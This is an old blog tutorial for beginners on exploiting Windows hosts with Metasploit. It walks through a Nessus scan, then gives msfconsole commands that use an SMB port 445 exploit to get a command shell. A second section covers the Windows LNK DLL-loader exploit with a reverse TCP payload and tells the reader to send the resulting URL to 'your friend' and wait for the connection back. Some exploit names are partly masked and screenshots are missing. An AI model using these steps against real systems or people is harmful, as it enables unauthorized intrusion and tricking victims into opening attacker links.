Saturday, October 15, 2011

Metasploit Basic exploiting for new Starters




SCANNED WITH NESSUS:
IP: 192.168.*.*

Number of vulnerabilities
Open ports: 29
High: 300
Medium: 47
Low: 77


Remote host information
Operating System: Microsoft Windows Server (English)

Synopsis:
The remote host seems to be a VMware virtual machine.

Description:
According to the MAC address of its network adapter, the remote host is a VMware virtual machine.

LIST OF OPEN PORTS:



TESTING WITH FRAMEWORK:
Ex:
Go to the Metasploit Framework.
I've chosen port 445 since it has a high number of vulnerabilities.


Now we choose the vulnerability with ID 19408.
Now we go to the framework and search for the exploit corresponding to the above vulnerability.

 

We choose the above exploit:
Ex:


Now type >show options to see whether the target host is set.

 

As you can see, there is no target set, so now we set the target below:





The target should be set to 0, as it is given that it works against Windows 2***:


---------------------------------------------
Now we select the payload.
To see the payloads, type:
>show payloads
To set the payload, see below:

To see whether our local IP or host is set, type:
>show options
You will see this:



As you can observe, LHOST (that is, our local IP) is not set.
To set it, type:

>set LHOST <host ip>

Now type:
>exploit


Hurray!
You will get the target host's command shell.
Enjoy!

========================================================================


Windows lnk Exploit

Hack the system using the Windows LNK exploit:

Update Metasploit.
Go to the prompt and go to the framework.

Then type:

#./msfconsole

The msf> prompt opens.

Then search for the Windows LNK exploit:

msf>search lnk

Then it shows the exploit:

exploit/xxxxx/xxxxxr/xxxxx_dllloader

Then type:
msf>use exploitname (type the above exploit)

Set SRVHOST, that is, your local IP, to get the connection back.

Then set the payload.

The shell/reverse_tcp payload works in most cases.

So type:

msf>set payload windows/metxxxxx/xxx_tcp
Then set LHOST to your local IP.

Then type:

msf>exploit

You will be shown a URL or address with a port number. Give it to your friend.
Tada!
Wait for the reverse connection.
---------------------------------------------------
Warning: I'm not responsible for your actions. This is for educational purposes only.
